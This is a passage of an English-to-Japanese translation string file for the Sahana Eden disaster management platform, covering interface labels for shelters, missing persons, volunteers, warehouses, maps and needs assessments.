'The Incident Reporting System allows the General Public to Report Incidents & have these Tracked.': '一般ユーザは、インシデント・レポートシステムからインシデントを報告し、その結果を表示させることができます。',
'The Location of this Site, which can be general (for Reporting) or precise (for displaying on a Map).': 'Siteのロケーション、(レポート用で)おおまかな場合と、(地図表示用で)正確な場合とがあります。',
'The Location the Person has come from, which can be general (for Reporting) or precise (for displaying on a Map). Enter a few characters to search from available locations.': 'その人物がやって来たロケーションで、報告のためのだいたいの場所、あるいは地図で表示するための正確な緯度経度です。使用可能なロケーションを検索するには最初の数文字を入力してください',
'The Location the Person is going to, which can be general (for Reporting) or precise (for displaying on a Map). Enter a few characters to search from available locations.': 'その人物が向かう場所は報告用の概要レベルの情報あるいは地図上の表示のため正確な情報いずれの場合もあります。場所名の数文字を入力すると、登録済みの場所から検索できます。',
'The Media Library provides a catalog of digital media.': 'メディア・ライブラリーは、デジタル・メディアの一覧を提供します。',
'The Messaging Module is the main communications hub of the Sahana system. It is used to send alerts and/or messages using SMS & Email to various groups and individuals before, during and after a disaster.': 'メッセージング・モジュールは、SAHANAシステムのコミュニケーション中心となります。災害の前、災害中または災害の後に様々なグループや個人にSMSとeメールで警報やメッセージを送ります。',
'The Office this record is associated with.': 'このレコードに関連するオフィス',
'The Organization Registry keeps track of all the relief organizations working in the disaster region. It captures not only the places where they are active, but also captures information on the range of projects they are providing in each area.': '団体情報を登録することで、被災地域で活動するすべての団体の活動を追跡します。また、それぞれの地域において、彼らがどこで活動しているかという情報だけでなく、彼らが各地で提供しているプロジェクトの範囲についての情報も提供します。',
'The Organization this record is associated with.': 'このレコードに関連する団体',
'The Organization which is funding this Activity.': 'この支援活動に資金を提供する団体',
'The Person currently filling this Role.': '現在この役割に属している人物',
'The Project Tracking module allows the creation of Activities to meet Gaps in Needs Assessments.': 'プロジェクト追跡モジュールでは、支援活動(アクティビティ)を作成し、必要な物資 / サービスのギャップを満たすことを目的とします。',
'The Rapid Assessments Module stores structured reports done by Professional Organizations.': '被災地の現況アセスメントには、専門団体によって行われたレポートの結果が格納されます。',
'The Request this record is associated with.': 'このレコードに関連する支援要請',
'The Requests Management System is a central online repository where all relief organizations, relief workers, government agents and camp sites for displaced personnel can coordinate the supply of aid with their demand. It allows users to allocate the available resources to fulfill the demands effectively and efficiently.': '支援要請管理システムは、全ての支援団体、救援者、政府職員、および避難所に暮らす避難者たち自身が、要求に応じて援助の供給を調整できる中央のオンラインデータベースです。支援要請管理システムは効果的かつ効率的に要求を満たすことができる利用可能な資源の割り当てを可能にします。',
'The Role this person plays within this Office/Project.': 'オフィス/プロジェクトにおける役割',
'The Role this person plays within this hospital.': '病院内における役割',
'The Role to which this Role reports.': 'この権限の報告先となる権限',
'The Shelter Registry tracks all shelters and stores basic details regarding them. It collaborates with other modules to track people associated with a shelter, the services available etc.': '避難所登録は、避難所を追跡し、それらの詳細を蓄積します。避難所に関連付けられた人、利用可能なサービス等の他のモジュールと協業します。',
'The Shelter this Request is from (optional).': '要請を行った避難所(オプション)',
'The Shelter this person is checking into.': 'この人物がチェックインした避難所',
'The URL for the GetCapabilities of a WMS Service whose layers you want accessible via the Map.': '地図を用いてレイヤを利用できる WMS サービスの GetCapabilities の URL。',
'The URL of your web gateway without the post parameters': 'ポストパラメータを指定しないWebゲートウェイのURL',
'The URL to access the service.': 'サービスにアクセスするためのURL',
'The Unique Identifier (UUID) as assigned to this facility by the government.': '政府UUID|政府がこの施設に割り当てている汎用一意識別子(UUID)。',
'The area is ': 'この地域は',
'The attribute within the KML which is used for the title of popups.': 'このKML属性はポップアップのタイトルに使われます。',
'The attribute(s) within the KML which are used for the body of popups. (Use a space between attributes)': 'KMLで定義されている属性はポップアップの本文に使用されます。(各属性ごとに半角スペースで分割して記載してください)',
'The body height (crown to heel) in cm.': '頭頂からかかとまでの身長(単位はcm)',
'The category of the Item.': 'この救援物資のカテゴリです',
'The contact person for this organization.': '団体の代表窓口',
'The country the person usually lives in.': 'この人物が普段の生活を営む国',
'The default policy for data import from this peer.': 'このデータ同期先からデータをインポートする際のデフォルト設定。',
'The descriptive name of the peer.': 'データ同期先のわかりやすい名称',
'The duplicate record will be deleted': '重複したレコードは削除されます',
'The entered unit links to this unit. For e.g. if you are entering m for meter then choose kilometer(if it exists) and enter the value 0.001 as multiplicator.': '入力した単位をこのユニットにリンクします。例えば、mをメートルとする場合、(存在するなら) kilometer を選択して、乗数に値 0.001 を入力します。',
'The first or only name of the person (mandatory).': '人物の苗字(必須)。 外国籍の方等については避難所等での管理上の主たる表記/順に従ってください。',
'The following modules are available': '利用可能なモジュールは以下のとおりです。',
'The hospital this record is associated with.': 'このレコードに関連のある病院。',
'The item is designated to be sent for specific project, population, village or other earmarking of the donation such as a Grant Code.': 'ある特定のプロジェクトや、人々、市町村への物資または、交付コード等のついた特定区域への寄付等のは物資は、送付されることになっています。',
'The language to use for notifications.': '通知に使用する言語',
'The language you wish the site to be displayed in.': 'このサイトを表示するための言語',
'The last known location of the missing person before disappearance.': '行方不明者が最後に目撃された場所',
'The length is ': '長さは',
'The list of Brands are maintained by the Administrators.': '銘柄一覧の整備は、管理者によって可能です',
'The list of Item categories are maintained by the Administrators.': '供給物資カテゴリの一覧は、管理者によってメンテナンスされています。',
'The name to be used when calling for or directly addressing the person (optional).': '電話をかける際など、直接連絡をとりたい場合に使われる名前(オプション)',
'The next screen will allow you to detail the number of people here & their needs.': '次の画面では、人数および必要な物資/サービスの詳細を確認できます。',
'The next screen will allow you to enter a detailed list of items and quantities, if appropriate...': '次のスクリーンで、項目の詳細なリストと量を入力できる場合があります。',
'The number of Units of Measure of the Alternative Items which is equal to One Unit of Measure of the Item': '元の物資一つと同じだけの、代替品の測定単位での数量',
'The number of tiles around the visible map to download. Zero means that the 1st page loads faster, higher numbers mean subsequent panning is faster.': '表示している地図の周辺タイルをダウンロードする数。0は最初のページの読み込みがより早い事を意味し、数字を大きくすると視点をパンした際に表示がより早くなります。',
'The person at the location who is reporting this incident (optional)': '現地からこのインシデントを報告した人物(オプション)',
'The person reporting about the missing person.': '行方不明者情報の提供者。',
'The person reporting the missing person.': '行方不明者を報告した人',
'The post variable containing the phone number': '電話番号を含む post 変数',
'The post variable on the URL used for sending messages': 'メッセージ送信に使用するURLのPOST変数',
'The post variables other than the ones containing the message and the phone number': 'メッセージや電話番号以外を含むpost変数',
'The serial port at which the modem is connected - /dev/ttyUSB0, etc on linux and com1, com2, etc on Windows': 'モデムが接続されているシリアルポート - Linuxでは /dev/ttyUSB0 等、Windowsでは com1, com2 等',
'The server did not receive a timely response from another server that it was accessing to fill the request by the browser.': '要求を満たすためアクセスしていた別のサーバーからの応答がありませんでした。',
'The server received an incorrect response from another server that it was accessing to fill the request by the browser.': '要求を満たすためアクセスしていた別のサーバーから不正な応答が返ってきました。',
'The simple policy allows anonymous users to Read & registered users to Edit. The full security policy allows the administrator to set permissions on individual tables or records - see models/zzz.py.': 'シンプルポリシーでは、匿名ユーザーによるデータの閲覧、および、登録ユーザーによる編集が許可されます。完全版ポリシーでは、個々のテーブルやレコードに対して管理権限を設定することができます。詳細はmodels/zzz.pyを参照してください。',
'The subject event no longer poses a threat or concern and any follow on action is described in <instruction>': '件名のイベントはこれ以上の脅威や懸案事項を引き起こすことはありません。よって、<instruction>には、今後実施すべきアクションが記述されていません。',
'The time difference between UTC and your timezone, specify as +HHMM for eastern or -HHMM for western timezones.': 'あなたのタイムゾーンとUTCとの差を、東では+HHMMで、西では-HHMMで指定してください',
'The title of the WMS Browser panel in the Tools panel.': '[ツール]パネルのWMS Browserパネルのタイトル',
'The token associated with this application on': 'このアプリケーションが関連づけられているトークン',
'The unique identifier of the peer. Leave blank if the peer is no Sahana Eden instance, it will be auto-assigned in that case.': '一意のデータ同期先識別子です。データ同期先がSahana Edenシステムではない場合は、空白にしておくことで自動的に割り当てが行われます。',
'The unique identifier which identifies this instance to other instances.': 'このインスタンスを他のインスタンスと区別するための固有識別子',
'The way in which an item is normally distributed': '物資が配給される際の通常経路',
'The weight in kg.': '重量(単位:kg)',
'The': ' ',
'Theme Details': 'テーマの詳細',
'Theme added': 'テーマを追加しました',
'Theme deleted': 'テーマを削除しました',
'Theme updated': 'テーマを更新しました',
'Theme': 'テーマ',
'Themes': 'テーマ',
'There are errors': 'エラーが発生しました',
'There are multiple records at this location': 'このロケーションに複数のレコードが存在します',
'There are not sufficient items in the Inventory to send this shipment': 'この輸送を開始するために十分な量の物資が備蓄されていません',
'There is no address for this person yet. Add new address.': 'この人物の住所がまだありません。新しい住所を入力してください',
'There was a problem, sorry, please try again later.': '問題が発生しています。すみませんが、時間を置いてからやり直してください。',
'These are settings for Inbound Mail.': '電子メール受信箱の設定です',
'These are the Incident Categories visible to normal End-Users': '普通のユーザーが見ることができるインシデント一覧です',
'These are the default settings for all users. To change settings just for you, click ': 'これらは、全てのユーザーのデフォルト設定です。個人用の設定を変更するには、以下をクリックしてください。',
'These need to be added in Decimal Degrees.': 'これらは、十進角で追加する必要があります。',
'They': 'それら',
'This Group has no Members yet': 'メンバはまだ登録されていません',
'This Team has no Members yet': 'メンバはまだ登録されていません',
'This appears to be a duplicate of ': 'これは、以下のものと重複しているようです。',
'This can either be the postal address or a simpler description (such as `Next to the Fuel Station`).': '住所か、あるいは簡単な記述(ガソリンスタンドの隣、など)を記載しています。',
'This email address is already in use': 'このメールアドレスは使用されています',
'This file already exists on the server as': 'このファイルは別の名前でサーバに既に存在しています : ',
'This form allows the administrator to remove a duplicate location.': '管理者はこのフォームを使うことで、重複したロケーションデータを削除できます。',
'This is the way to transfer data between machines as it maintains referential integrity.': '参照整合性を保ちつつ、端末間でデータを転送する方法が記載されています。',
'This is the way to transfer data between machines as it maintains referential integrity...duplicate data should be removed manually 1st!': '参照整合性を保ちつつ、端末間でデータを転送する方法が記載されています。...重複したデータは最初に手動で削除する必要があります。',
'This might be due to a temporary overloading or maintenance of the server.': 'サーバーが一時的に過負荷状態になっているか、あるいはメンテナンスを行っています。',
'This page shows you logs of past syncs. Click on the link below to go to this page.': '過去に行ったデータ同期履歴を表示します。以下のリンクをクリックしてください。',
'This screen allows you to upload a collection of photos to the server.': 'この画面では、複数の画像をサーバーにアップロードすることができます。',
'This shipment has already been received.': '輸送が開始され、物資が受領されました',
'This shipment has already been sent.': '輸送が開始され、送付されました',
'This shipment has not been received - it has NOT been canceled because it can still be edited.': 'この輸送は受領されていません。 - まだ編集可能であり、キャンセルされてはいません',
'This shipment has not been sent - it has NOT been canceled because it can still be edited.': '輸送はまだ開始されていませんが、キャンセルされてはいません。編集可能です。',
'This shipment will be confirmed as received.': 'この輸送された物資は、受信済み扱いになります',
'This value adds a small mount of distance outside the points. Without this, the outermost points would be on the bounding box, and might not be visible.': 'この値はその地点の外側までの距離の小さなマウントを追加します。この値が無い場合は、一番外側の地点が境界ボックスになり、表示されない可能性があります。',
'This value gives a minimum width and height in degrees for the region shown. Without this, a map showing a single point would not show any extent around that point. After the map is displayed, it can be zoomed as desired.': 'この値はこの地域を表示する時に使う最小の幅と高さを示します。この値がない場合、ある単一の地点を表示するときにその周辺の範囲は表示されません。地図が表示された後では、好きな大きさに拡大・縮小できます。',
'Thunderstorm': '雷雨',
'Thursday': '木曜日',
'Ticket Details': 'チケットの詳細',
'Ticket ID': 'チケットID',
'Ticket added': 'チケットを追加しました',
'Ticket deleted': 'チケットを削除しました',
'Ticket updated': 'チケットを更新しました',
'Ticket': 'チケット',
'Ticketing Module': 'チケット発行モジュール',
'Tickets': 'チケット',
'Tilt-up concrete': 'ティルトアップ式コンクリート',
'Timber frame': '木造',
'Time needed to collect water': '水の確保に必要な時間',
'Time of Request': '要求発生時刻',
'Timeline Report': 'タイムラインレポート',
'Timeline': 'タイムライン',
'Timestamp': 'タイムスタンプ',
'Title': 'タイトル',
'To Location': '送付先ロケーション',
'To Organization': '送付先団体',
'To Person': '送付先人物情報',
'To Site': '送付先サイト',
'To begin the sync process, click the button on the right => ': '右のボタンを押すと、データ同期が開始されます。',
'To begin the sync process, click this button => ': 'このボタンを押すと、データ同期が開始されます。=>',
'To create a personal map configuration, click ': '個人用の地図設定を作成するにはクリックしてください',
'To delete': '削除する側',
'To edit OpenStreetMap, you need to edit the OpenStreetMap settings in models/000_config.py': 'OpenStreetMapを編集する際は、models/000_config.pyで定義されている設定を編集してください',
'To submit a new job, use the': 'jobを新規送信するには、以下を使用してください。',
'To variable': '変数に',
'To': ' ',
'Tools': 'ツール',
'Tornado': '竜巻',
'Total # of Beneficiaries Reached ': '支援が到達した受益者の合計数 ',
'Total # of Target Beneficiaries': '受益対象者の合計人数',
'Total # of households of site visited': '訪問した世帯数',
'Total Beds': '合計ベッド数',
'Total Beneficiaries': '受益者の総数',
'Total Cost per Megabyte': 'メガバイト毎の合計費用',
'Total Cost per Minute': '一分毎の合計費用',
'Total Households': '総世帯数',
'Total Monthly Cost': '月額総計',
'Total Monthly Cost: ': '月毎の費用の合計: ',
'Total Monthly': '月ごとの合計',
'Total One-time Costs': '1回毎の費用総計',
'Total Persons': '合計者数',
'Total Recurring Costs': '経常費用総計',
'Total Unit Cost': '単価合計',
'Total Unit Cost: ': '単価合計: ',
'Total Units': '総数',
'Total gross floor area (square meters)': '延面積(平方メートル)',
'Total number of beds in this hospital. Automatically updated from daily reports.': 'この病院のベッド数総計。日時レポートにより、自動的に更新されます。',
'Total number of houses in the area': 'この地域の家屋総数',
'Total number of schools in affected area': '被災地内の学校総数',
'Total population of site visited': '訪問地域の総人口数',
'Total': '合計数',
'Totals for Budget:': '予算の合計:',
'Totals for Bundle:': 'Bundleの合計:',
'Totals for Kit:': 'Kitの合計:',
'Tourist Group': '旅行者グループ',
'Town': '町',
'Traces internally displaced people (IDPs) and their needs': '国内の避難している人(IDP)と彼らの必要としている物資/サービスの追跡',
'Tracing': '履歴の追跡',
'Track Details': '追跡情報の詳細',
'Track deleted': '追跡情報を削除しました',
'Track updated': '追跡情報を更新しました',
'Track uploaded': '追跡情報をアップデートしました',
'Track': '追跡情報',
'Tracking of Projects, Activities and Tasks': 'プロジェクトや支援活動、タスクの追跡',
'Tracking of basic information on the location, facilities and size of the Shelters': '避難所の基本情報(場所、施設、規模等)を追跡',
'Tracks requests for aid and matches them against donors who have pledged aid': '支援要請を管理し、救援物資の提供者とマッチングします。',
'Tracks the location, distibution, capacity and breakdown of victims in Shelters': '避難所のロケーション、配置、収容能力と被災者の状態を追跡します。',
'Tracks': 'トラック',
'Traffic Report': 'トラフィックレポート',
'Transfer': '輸送',
'Transit Status': '輸送状態',
'Transit': '移動中の立ち寄り',
'Transit. Status': '輸送状態',
'Transition Effect': '推移への影響',
'Transparent?': '透明ですか?',
'Transportation assistance, Rank': '移動 / 輸送支援、ランク',
'Trauma Center': '心的外傷センター',
'Travel Cost': '移動費',
'Tree': '樹木',
'Tropical Storm': '熱帯低気圧',
'Tropo Messaging Token': 'Tropo メッセージのトークン',
'Tropo Settings': 'Tropo 設定',
'Tropo Voice Token': 'Tropo 音声トークン',
'Tropo settings updated': 'Tropo 設定を更新しました',
'Truck': 'トラック',
'Try checking the URL for errors, maybe it was mistyped.': '入力したURLに間違いがないか確認してください。',
'Try hitting refresh/reload button or trying the URL from the address bar again.': 'ページの再読み込みを行うか、あるいはアドレスバーに直接URLを入力してみてください。',
'Try refreshing the page or hitting the back button on your browser.': 'ページを再読込するか、ブラウザの[戻る]ボタンを押してください。',
'Tsunami': '津波',
'Tuesday': '火曜日',
'Twitter ID or #hashtag': 'Twitter ID あるいは #ハッシュタグ',
'Twitter Settings': 'Twitter設定',
'Type of Construction': '建物の種類',
'Type of cause': '原因のタイプ',
'Type of latrines': 'トイレの種類',
'Type of place for defecation': '排泄用地の種類',
'Type of water source before the disaster': '災害発生前の水の確保方法',
'Type': 'タイプ',
'Types of health services available': '利用可能な健康サービスの種別',
'Types of water storage containers available': '利用可能な水貯蔵容器の種別',
'UID': 'ユニークID',
'UN': '国連',
'UTC Offset': 'UTC(世界標準時刻)との差',
'Unable to parse CSV file!': 'CSVファイルをパースできません。',
'Understaffed': '人員不足',
'Unidentified': '詳細不明',
'Unit Bed Capacity': 'ベッド収容数',
'Unit Cost': '単価',
'Unit Details': '単位の詳細',
'Unit Name': '単位名',
'Unit Set': '単位の設定',
'Unit Short Code for e.g. m for meter.': '単位の略称、例えばメートルはmと表記。',
'Unit added': '単位を追加しました',
'Unit deleted': '単位を削除しました',
'Unit of Measure': '1個口の内訳',
'Unit updated': '単位を更新しました',
'Unit': '単位',
'Units of Measure': '測定単位',
'Units': '単位',
'Unknown Peer': '登録に無いデータ同期先',
'Unknown type of facility': '施設規模不明',
'Unknown': '不明',
'Unreinforced masonry': '補強されていない石造建築物',
'Unresolved Conflicts': '未解決のデータ競合',
'Unsafe': '危険な',
'Unselect to disable the modem': 'モデムを無効化するにはチェックを外す',
'Unsent': '未送信',
'Unsupported data format!': 'サポートされていないデータフォーマットです。',
'Unsupported method!': 'サポートされていないメソッドです。',
'Unsupported method': 'サポートされていないメソッドです',
'Update Activity Report': '支援活動レポートの更新',
'Update Cholera Treatment Capability Information': 'コレラ対策能力情報を更新',
'Update Import Job': 'Import Jobの更新',
'Update Request': '支援要請を更新',
'Update Service Profile': 'サービスプロファイルの更新',
'Update Task Status': 'タスク状況の更新',
'Update Unit': '単位の更新',
'Update if Master': 'マスターサイトなら更新する',
'Update if Newer': '新しいものがあれば更新する',
'Update your current ordered list': '現在の順序付きリストの更新',
'Update': '更新',
'Upload Photos': '写真のアップロード',
'Upload Spreadsheet': 'スプレッドシートのアップロード',
'Upload Track': '追跡情報のアップロード',
'Upload a Spreadsheet': 'スプレッドシートをアップロード',
'Upload an image file (bmp, gif, jpeg or png), max. 300x300 pixels!': '画像ファイルをアップロード(bmp,gif,jpeg,png) 最大300x300ピクセル',
'Upload an image file here.': '画像ファイルをここにアップロードしてください',
'Upload an image, such as a photo': '写真などのイメージをアップロードしてください',
'Upload': 'アップロード',
'Urban Fire': '都市火災',
'Urban area': '市街地',
'Urdu': 'ウルドゥー語',
'Urgent': '緊急',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': '複雑なクエリを構築するには、ANDは (...)&(...) を、ORは (...)|(...) を、NOTは ~(...) を使用してください。',
'Use default': 'デフォルト値を使用',
'Use these links to download data that is currently in the database.': 'これらのリンクを使用して、現在データベースにあるデータをダウンロードします。',
'Use this space to add a description about the Bin Type.': 'Bin Typeに関する説明は、このスペースに記載してください。',
'Use this space to add a description about the site location.': 'このスペースを使って、サイトの位置の説明を追加してください。',
'Use this space to add a description about the warehouse/site.': '倉庫/Siteに関する説明は、このスペースに記載してください。',
'Use this space to add additional comments and notes about the Site/Warehouse.': 'Site/倉庫に関する追加情報を記載するには、このスペースを使用してください。',
'Used to import data from spreadsheets into the database': 'スプレッドシートからデータベースにデータをインポートするために使われます',
'User %(first_name)s %(last_name)s Approved': '%(first_name)s %(last_name)s のユーザー登録が承認されました',
'User %(id)s Logged-in': 'ユーザー %(id)s がログインしています',
'User %(id)s Logged-out': 'ユーザー %(id)s がログアウトしました',
'User %(id)s Profile updated': 'ユーザ %(id)s のプロファイルを更新しました',
'User %(id)s Registered': 'ユーザー%(id)sを登録しました',
'User Account has been Disabled': 'ユーザアカウントが無効になっています',
'User Details': 'ユーザーの詳細',
'User ID': 'ユーザーID',
'User Management': 'ユーザー管理',
'User Profile': 'ユーザープロファイル',
'User Requests': 'ユーザー要求',
'User Updated': 'ユーザーを更新しました',
'User added': 'ユーザーを追加しました',
'User already has this role': 'この権限のあるユーザー',
'User deleted': 'ユーザーを削除しました',
'User updated': 'ユーザーを更新しました',
'User': 'ユーザー',
'Username for authentication at the peer. Note that only HTTP Basic authentication is supported.': 'データ同期先との認証に使うユーザ名。HTTPベーシック認証のみサポートしています。',
'Username': 'ユーザー名',
'Users removed': 'ユーザーを削除しました',
'Users': 'ユーザー',
'Usual food sources in the area': 'この地域の普段の食料調達方法',
'Utilities': 'ユーティリティ',
'Utility, telecommunication, other non-transport infrastructure': 'ユーティリティ、通信、その他のインフラ設備(交通以外)',
'Vacancies': '欠員',
'Value': '値',
'Various Reporting functionalities': '多種多様な報告を行う機能',
'Vehicle Crime': '車両犯罪',
'Vehicle Types': '車両の種別',
'Vehicle': '車両',
'Vendor': 'ベンダー',
'Verification Email sent - please check your email to validate. If you do not receive this email please check you junk email or spam filters': 'メールアドレス確認用のメールを送信しました。メールに記載された確認用URLにアクセスしてください。もしメールが届かない場合迷惑メールフォルダに入ってしまっている可能性がありますのでご確認ください。',
'Verification Status': '認証ステータス',
'Verified': '認証済み',
'Verified?': '認証(ログイン)できません.メールアドレス・パスワードを確認してください.',
'Verify Password': 'パスワード再確認',
'Verify password': 'パスワードの確認',
'Version': 'バージョン',
'Very High': '非常に高い',
'View Alerts received using either Email or SMS': '電子メールまたはSMSで受信したアラートの閲覧',
'View Fullscreen Map': '地図をフルスクリーン表示',
'View Image': '画像の閲覧',
'View On Map': '地図上で閲覧',
'View Outbox': '送信箱の表示',
'View Picture': '写真の表示',
'View Requests for Aid': '援助要請を閲覧',
'View Settings': '設定の確認',
'View Tickets': 'チケットの閲覧',
'View and/or update their details': '詳細の閲覧および更新',
'View or update the status of a hospital.': '病院のステータスの閲覧と更新',
'View pending requests and pledge support.': '処理中の要求と寄付サポートの閲覧',
'View the hospitals on a map.': '病院の場所を地図上で表示します。',
'Village Leader': '村長',
'Village': '村落',
'Visible?': '表示しますか?',
'Visual Recognition': '画像認識',
'Volcanic Ash Cloud': '火山灰雲',
'Volcanic Event': '火山活動',
'Volume - Fluids': '流量 - 液状物',
'Volume - Solids': '流量 - 固形物',
'Volume Capacity': '容量',
'Volume/Dimensions': '容量/外形寸法',
'Volunteer Data': 'ボランティアデータ',
'Volunteer Details': 'ボランティアの詳細',
'Volunteer Management': 'ボランティアの管理',
'Volunteer Project': 'ボランティアプロジェクト',
'Volunteer Registration': 'ボランティア登録',
'Volunteer Registrations': 'ボランティア登録',
'Volunteer Request': 'ボランティア要請',
'Volunteer added': 'ボランティアを追加しました',
'Volunteer deleted': 'ボランティアを削除しました',
'Volunteer details updated': 'ボランティアの詳細を更新しました',
'Volunteer registration added': 'ボランティア登録を追加しました',
'Volunteer registration deleted': 'ボランティア登録を削除しました',
'Volunteer registration updated': 'ボランティア登録を更新しました',
'Volunteers were notified!': 'ボランティアに通知されました',
'Volunteers': 'ボランティア',
'Vote': '投票',
'Votes': '投票',
'WASH': '除染',
'WMS Browser Name': 'WMSブラウザ名',
'WMS Browser URL': 'WMSブラウザのURL',
'Walking Only': '徒歩のみ',
'Walking time to the health service': '医療サービス提供所までの徒歩時間',
'Wall or other structural damage': '壁やその他の構造の損傷',
'Warehouse Details': '倉庫の詳細',
'Warehouse Item Details': '倉庫物資の詳細',
'Warehouse Item added': '倉庫物資を追加しました',
'Warehouse Item deleted': '倉庫内物資を削除しました',
'Warehouse Item updated': '倉庫物資を更新しました',
'Warehouse Items': '倉庫に備蓄中の物資',
'Warehouse Management': '倉庫管理',
'Warehouse added': '倉庫を追加しました',
'Warehouse deleted': '倉庫を削除しました',
'Warehouse updated': '倉庫を更新しました',
'Warehouse': '倉庫',
'Warehouse/Sites Registry': '倉庫/Siteの登録',
'Warehouses': '倉庫',
'WatSan': '給水と衛生',
'Water Level still high?': '水位はまだ高いままですか?',
'Water Sanitation Hygiene': '水質衛生',
'Water collection': '給水',
'Water gallon': 'ガロン容器',
'Water storage containers available for HH': '世帯用の水貯蔵容器が利用可能である',
'Water storage containers in households': '世帯の水貯蔵容器',
'Water storage containers sufficient per HH': '世帯毎に1つ以上の水貯蔵容器が利用可能である',
'Water supply': '水の供給',
'Water': '水',
'Waterspout': '水上竜巻',
'Way Bill(s)': '移動費',
'We have tried': '私達は試行しました',
'Website': 'ウェブサイト',
'Wednesday': '水曜日',
'Weekly': '週次',
'Weight (kg)': '体重 (kg)',
'Weight': '体重',
'Welcome to the Sahana Eden Disaster Management Platform': 'Sahana Eden -災害情報管理プラットフォームへようこそ',
'Welcome to the Sahana Eden Disaster Management System': 'Sahana Eden -災害情報管理システムへようこそ',
'Welcome to the Sahana Portal at ': 'Sahana ポータルへようこそ: ',
'Welcome to the Sahana Portal at': 'Sahanaポータルにようこそ',
'Well-Known Text': '既知の文章',
'Were basic medical supplies available for health services prior to the disaster?': '災害前に、基本的な医療サービスが機能していたかどうかを記載してください',
'Were breast milk substitutes used prior to the disaster?': '災害前に利用していた母乳代用品の入手源を記載してください',
'Were there cases of malnutrition in this area prior to the disaster?': 'この地域で、災害前に栄養失調が発生していたかどうかを記載してください',
'Were there health services functioning for the community prior to the disaster?': '災害前、共同体でヘルスサービスが機能していたかどうかを記載してください',
'Were there reports or evidence of outbreaks of any micronutrient malnutrition disorders before the emergency?': '災害発生前から栄養失調の報告があった、あるいはその証跡があったかどうかを記載します',
'What are the factors affecting school attendance?': '生徒の就学状況に影響する要因を記載してください',
'What are your main sources of cash to restart your business?': 'ビジネス再開に必要な現金の、主な調達源を記載してください',
'What are your main sources of income now?': '現在の主な収入源を記載してください',
'What do you spend most of your income on now?': '現在の主な支出要因を記載してください',
'What food stocks exist? (main dishes)': '備蓄食料の種類(主皿)',
'What food stocks exist? (side dishes)': '備蓄食料の種類(副皿)',
'What is the estimated total number of people in all of these institutions?': '上記施設内の居住者を総計すると、おおよそどの程度になるかを記載してください',
'What is your major source of clean water for daily use (ex: washing, cooking, bathing)?': '洗濯、料理、入浴など、日常生活で必要となる清潔な水の、主な入手源を記載してください',
'What is your major source of drinking water?': '飲料水の主な入手源を記載してください',
'What type of latrines are available in the village/IDP centre/Camp?': '村落/IDPセンター/仮泊施設内で利用可能なトイレのタイプは?',
'What type of salvage material can be used from destroyed houses?': '全壊した家屋から回収した部材が流用可能な用途を記載します',
'What type of salvage material can be used from destroyed schools?': '倒壊した校舎において、再利用できる部材は何ですか?',
'What types of health problems do children currently have?': '小児が現在抱えている健康問題のタイプを記載してください',
'What types of health problems do people currently have?': '住人たちが現在抱えている健康問題のタイプを記載してください',
'What types of health services are still functioning in the affected area?': '現在、被災地で機能しているヘルスサービスの種類を選択してください',
'What types of household water storage containers are available?': '世帯で使っている水貯蔵容器のタイプを選択してください',
'What were your main sources of income before the disaster?': '災害発生前の主な収入源を選択してください',
'Wheat': '小麦',
'When a map is displayed that focuses on a collection of points, the map is zoomed to show just the region bounding the points. This value adds a small mount of distance outside the points. Without this, the outermost points would be on the bounding box, and might not be visible.': '地図上に複数のポイントが表示されている場合、それらポイント全てを表示できる縮尺で地図が表示されます。この値は、それらポイントの外に余白を付与します。指定しない場合、表示領域とポイントが重なり、表示範囲から外れてしまう可能性があります。',
'When a map is displayed that focuses on a collection of points, the map is zoomed to show just the region bounding the points. This value gives a minimum width and height in degrees for the region shown. Without this, a map showing a single point would not show any extent around that point. After the map is displayed, it can be zoomed as desired.': '地図上に複数のポイントが表示されている場合、それらポイント全てを表示できる縮尺で地図が表示されます。この値は、地域を表示する際の横幅と縦高の最小値となります。指定しない場合、対象の一点のみ表示され、その周辺は表示されません。一度表示された後であれば、縮尺の変更が可能です。',
'When a map is displayed that focuses on a collection of points, the map is zoomed to show just the region bounding the points.': '地点の集合にフォーカスを合わせた地図を表示すると、この地図はそれら地点の集合を表示できる範囲に拡大・縮小します',
'When reports were entered': 'いつ報告が入力されたか',
'Where are the alternative places for studying?': '学校以外で、学習が可能な施設の種類を選択してください',
'Where are the separated children originally from?': '保護者が居ない児童の住居地はどこですか?',
'Where do the majority of people defecate?': 'トイレはどこで済ませますか?',
'Where have the children been sent?': '疎開先の情報がある場合は記載してください',
'Where is solid waste disposed in the village/camp?': '村落/仮泊施設内での、固形廃棄物処理場所を記載してください',
'Whether this is a Sahana Eden, Sahana Agasti, Ushahidi or Other instance.': 'Sahana Eden, Sahana Agasti, Ushahidi あるいは他のシステムの場合も',
'Whiskers': 'ほおひげ',
'Who is doing what and where': '誰がどこで何をしているか',
'Who usually collects water for the family?': '日頃、家族のために水を採取しているのは誰か?',
'Width': '横幅',
'Wild Fire': '野火',
'Wind Chill': '風速冷却',
'Window frame': 'ウィンドウ枠',
'Winter Storm': '吹雪',
'Without mentioning any names or indicating anyone, do you know of any incidents of violence against women or girls occuring since the disaster?': '災害発生後、女性や少女に対する暴力事件が発生したかどうかを記載してください。具体的な人名や場所を記載する必要はありません',
'Women of Child Bearing Age': '出産年齢の女性',
'Women participating in coping activities': '女性が災害対応に従事',
'Women who are Pregnant or in Labour': '妊娠中、あるいは労働中の女性',
'Womens Focus Groups': '女性のフォーカスグループ(Womens Focus Groups)',
'Wooden plank': '木製板',
'Wooden poles': '木製の柱',
'Working hours end': '作業終了時刻',
'Working hours start': '作業開始時刻',
'Working or other to provide money/food': '金銭/食料調達のため就労、あるいは活動を実施',
'Would you like to display the photos on the map?': '地図上に写真を表示しますか?',
'X-Ray': 'X線',
'Year built': '建築年',
'Year of Manufacture': '製造年',
'Yellow': '黄色',
'Yes': 'はい',
'You are a recovery team?': 'あなたが遺体回収チームの場合',
'You are attempting to delete your own account - are you sure you want to proceed?': '自分のアカウントを削除しようとしています。本当に削除しますか?',
'You are currently reported missing!': 'あなたが行方不明者として登録されています!',
'You can change the configuration of synchronization module in the Settings section. This configuration includes your UUID (unique identification number), sync schedules, beacon service and so on. Click the following link to go to the Sync Settings page.': '同期に関する設定は、「設定」セクションで行うことができます。設定には、UUID(unique identification number)、同期スケジュール、ビーコンサービス等が含まれます。同期設定は以下のリンクから変更可能です。',
'You can click on the map below to select the Lat/Lon fields': '下の地図をクリックすることで、緯度経度情報を入力できます',
'You can click on the map below to select the Lat/Lon fields:': '緯度と経度の設定は、以下の地図をクリックすることでも可能です:',
